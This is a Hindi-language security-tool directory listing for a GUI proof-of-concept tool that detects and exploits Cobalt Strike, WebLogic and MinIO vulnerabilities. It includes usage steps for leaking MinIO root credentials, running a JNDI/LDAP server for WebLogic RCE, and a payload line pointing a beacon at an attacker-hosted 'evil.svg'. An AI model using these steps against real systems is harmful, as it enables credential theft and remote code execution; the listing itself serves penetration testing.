Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Gui-poc-test — CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 के लिए एक परीक्षण उपकरण | Kitploit
उपकरण/GitHubGitHub/romanc9/gui-poc-test
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubromanc9/gui-poc-test

Gui-poc-test

CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 के लिए एक परीक्षण उपकरण

रिपॉजिटरी देखें
222 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gui-poc-test

CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 के लिए एक परीक्षण उपकरण इन तीन कमजोरियों के लिए ग्राफिकल भेद्यता पहचान और शोषण उपकरण

सावधानियाँ

  1. jar चलाने के लिए Java8 आवश्यक है

  2. एकल लक्ष्य के लिए, एकाधिक IP स्कैनिंग के लिए उपयुक्त नहीं

  3. पैकेजिंग करते समय weblogic भेद्यता शोषण के लिए wlfullclient.jar का संदर्भ लेना आवश्यक है, इसे स्वयं जोड़ना होगा

उपयोग

java -jar Gui-poc-test.jar

उपयोग विधि: दो बटन हैं - पहचान और शोषण, विभिन्न भेद्यताओं के लिए उपयोग विधि उपकरण इंटरफ़ेस में संकेत दिया गया है

MinIO सूचना लीक:

लक्ष्य दर्ज करें, पोर्ट दर्ज करने की आवश्यकता नहीं है, डिफ़ॉल्ट 9000 है, बदला जा सकता है, स्रोत कोड GuiDemo.java:line144 देखें

MINIO_ROOT_USER और MINIO_ROOT_PASSWORD आदि प्रदर्शित करता है

छवि

Weblogic RCE

लक्ष्य IP, पोर्ट, LDAP सर्वर पता दर्ज करें

पहचान:

छवि

नोट: भेद्यता शोषण के लिए स्वयं LDAP सर्वर (सार्वजनिक नेटवर्क) स्थापित करना आवश्यक है

  • jndi सर्वर शोषण उपकरण: JNDIExploit.jar उपकरण का उपयोग करके LDAP और WEB सेवाएं शुरू करें, https://github.com/WhiteHSBG/JNDIExploit देखें
छवि

CobaltStrike RCE

  1. भेद्यता चुनने के बाद डिफ़ॉल्ट रूप से स्वयं-जांच विधि दिखाई जाती है, CS लिसनर में पहचान कोड दर्ज करके भेद्यता की उपस्थिति का परीक्षण किया जा सकता है
  2. भेद्यता शोषण की पूर्व शर्त: स्थानीय रूप से दूसरे पक्ष का ट्रोजन (exe) प्राप्त होना चाहिए
  3. संचालन वातावरण आवश्यकताएँ: Windows, python3, pip3 द्वारा स्थापित frida-tools
  4. python पर्यावरण चर में जोड़ा गया है
  5. स्वयं सर्वर स्थापित करें जिसमें SVG फ़ाइल और JAR पैकेज रखें, दूसरा पक्ष उस तक पहुँच सके
  6. exe का पूर्ण पथ और SVG पता दर्ज करें, स्पेस से अलग करें, निष्पादित पर क्लिक करके प्रतिकार करें
  7. JAR पैकेज की सामग्री स्वयं सेट करें, प्रदर्शन सामग्री कैलकुलेटर खोलना है
  8. डिफ़ॉल्ट ट्रोजन नाम beacon है, संशोधित किया जा सकता है, स्रोत कोड cve_2022_39197.py:line28 देखें

पेलोड उदाहरण: beacon.exe http://127.0.0.1:4444/evil.svg

परिणाम: Windows पर ट्रोजन चलाएं, Mac पर CS क्लाइंट ऑनलाइन हो जाता है

साथ ही CS सर्वर JAR पैकेज सामग्री निष्पादित करता है, कैलकुलेटर खुलता है

छवि

Windows पर CS एक्सेस पता लॉग होता है

छवि

संदर्भ

सिद्धांत: https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

CS पैच: https://github.com/burpheart/CVE-2022-39197-patch

टूल डाउनलोड करें